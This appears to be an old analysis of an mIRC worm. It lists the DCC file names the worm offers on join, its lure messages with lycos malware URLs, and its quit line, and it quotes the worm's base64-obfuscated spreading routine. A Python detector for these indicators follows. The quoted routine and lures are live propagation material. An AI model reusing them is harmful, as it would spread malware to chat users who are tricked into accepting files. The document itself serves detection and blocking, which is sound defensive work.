http://www.vulnscan.org/tmp/virus/2004-04-16/
- sends a dcc on-join
like:
DCC SEND C:\WINNT\system32\ManualSeduccion.zip 3232236866 2970 123897
DCC SEND C:\WINNT\system32\avril.zip 3232236866 3169 123897
DCC SEND C:\WINNT\system32\images.zip 3232236866 3684 123897
the C:\WINNT\system32\ thing is HARDcoded [!]
All possible names (prefixed with C:\WINNT\system32\):
notes.zip
videos.zip
xxx.zip
ManualSeduccion.zip
postal.zip
hechizos.zip
images.zip
sex.zip
avril.zip
AND <nick>.zip, so dynamic :/.
- privatemsgs with one of the following textstrings on-join:
4,1Free XXX SexVideo 8,1http://membres.lycos.fr/iserver5/sexescene.avi
0,13Mira la foto 4,1->8,14 http://membres.lycos.fr/iserver5/andrea.jpg
5No crees en lo paranormal? 14http://members.lycos.co.uk/iserver4/hada.gif :|
13,1Britney, Christina, Jennifer, etc 8,1http://utenti.lycos.it/yserver3/britney.avi
4,1Pics Models 13,1http://utenti.lycos.it/yserver3/viviana.jpg4,1 Models Pics
7,0Aprende a conquistar al sexo opuesto 13,0 http://mitglied.lycos.de/iserver2/seduccion.txt
4,8Mira esta foto 8,4http://members.lycos.nl/iserver1/ovni.jpg
4,1Free pics Girls, Teens 8,1http://mitglied.lycos.de/iserver2/katherine.jpg
12,0Jenifer Love Hewitt Sex Video 4,0http://members.lycos.nl/iserver1/jeniferlove.avi
- quits with url
* loser ([email protected]) Quit (Quit: mirate esto -> http://members.lycos.co.uk/iserver4/playboy.avi)
seems to be always the same (?)
URLs are simple to block, the quit message too of course; the DCC files are fun because it prefixes them with C:\WINNT\System32\ (see source) [note btw that mIRC/most clients just skip everything till the last \ so the file shows up as just 'xxx.zip' etc]...
Here's the dcc send routine:
Alias sv { var %pb = C:\WINNT\system32 $+ $decode(XGZpbGV6aXAuemlw,m)
if ($exists(%pb) = $false) { halt } | var %rb = $rand(1,10)
if (%rb = 1) { .copy -o %pb $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) }
elseif (%rb = 2) { .copy -o %pb $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) }
elseif (%rb = 3) { .copy -o %pb $nofile(%pb) $+ $decode(eHh4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(eHh4LnppcA==,m) }
elseif (%rb = 4) { .copy -o %pb $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
elseif (%rb = 5) { .copy -o %pb $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) }
elseif (%rb = 6) { .copy -o %pb $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) }
elseif (%rb = 7) { .copy -o %pb $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) }
elseif (%rb = 8) { .copy -o %pb $nofile(%pb) $+ $decode(c2V4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(c2V4LnppcA==,m) }
elseif (%rb = 9) { .copy -o %pb $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) }
elseif (%rb = 10) { .copy -o %pb $nofile(%pb) $+ $me $+ .zip | Set %bv.file $nofile(%pb) $+ $me $+ .zip }
.ignore -rpcntikxu15 $address($nick,1) | csv $nick %bv.file $chan }
As you can see, that last one is a bit more annoying because it uses $me.
But it can still be recognized by c:\winnt\system32\*.zip; I don't know how many false positives that will have though.
Anyway.. dinner ;).
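Detection logic for the indicators listed in this post (the hard-coded C:\WINNT\system32\ DCC path, the fixed file-name list plus the <nick>.zip variant, and the lycos URLs in the on-join messages and quit line), as an added Python example that is not part of the original post. The parse/classify functions, their names and the sample strings are my own construction; the IP decoding follows the standard DCC "IP as unsigned long" encoding.

```python
import re
from collections import namedtuple

# Indicators taken from the post above; everything else here is constructed.
WORM_DIR = "c:\\winnt\\system32\\"          # hard-coded DCC path prefix
KNOWN_NAMES = {"notes.zip", "videos.zip", "xxx.zip", "manualseduccion.zip", "postal.zip",
               "hechizos.zip", "images.zip", "sex.zip", "avril.zip"}
WORM_URL_DIRS = {("membres.lycos.fr", "iserver5"), ("members.lycos.co.uk", "iserver4"),
                 ("utenti.lycos.it", "yserver3"), ("mitglied.lycos.de", "iserver2"),
                 ("members.lycos.nl", "iserver1")}

DCC_RE = re.compile(r"^DCC SEND (?P<file>.+?) (?P<ip>\d+) (?P<port>\d+) (?P<size>\d+)$")
URL_RE = re.compile(r"(https?://([^/\s]+)/([^/\s]+)/\S*)", re.I)
COLOR_RE = re.compile(r"\x03\d{0,2}(?:,\d{1,2})?")  # mIRC colour codes, stripped before matching

# path is the full path as announced; clients display only the part after the last backslash
DccSend = namedtuple("DccSend", "path ip port size")

def parse_dcc_send(ctcp: str):
    """Parse 'DCC SEND <path> <ip-as-long> <port> <size>'; return None if malformed."""
    m = DCC_RE.match(ctcp.strip("\x01 \r\n"))
    if not m:
        return None
    n = int(m["ip"])
    ip = ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))
    return DccSend(m["file"], ip, int(m["port"]), int(m["size"]))

def classify_dcc(ctcp: str, sender_nick: str):
    """Return a reason string when the offer matches the worm, else None."""
    dcc = parse_dcc_send(ctcp)
    if dcc is None or not dcc.path.lower().startswith(WORM_DIR):
        return None
    name = dcc.path.lower()[len(WORM_DIR):]
    if name in KNOWN_NAMES:
        return "known worm filename"
    if name == sender_nick.lower() + ".zip":
        return "<nick>.zip variant"
    if name.endswith(".zip") and "\\" not in name:
        return "zip offered from hard-coded system32 dir (weaker signal)"
    return None

def worm_url(text: str):
    """Return the first URL in a PRIVMSG/QUIT text that points at a known worm host+dir."""
    for m in URL_RE.finditer(COLOR_RE.sub("", text)):
        if (m.group(2).lower(), m.group(3).lower()) in WORM_URL_DIRS:
            return m.group(1)
    return None
```

The full announced path must be checked rather than the basename a client shows, which is exactly why the hard-coded prefix is a usable signal.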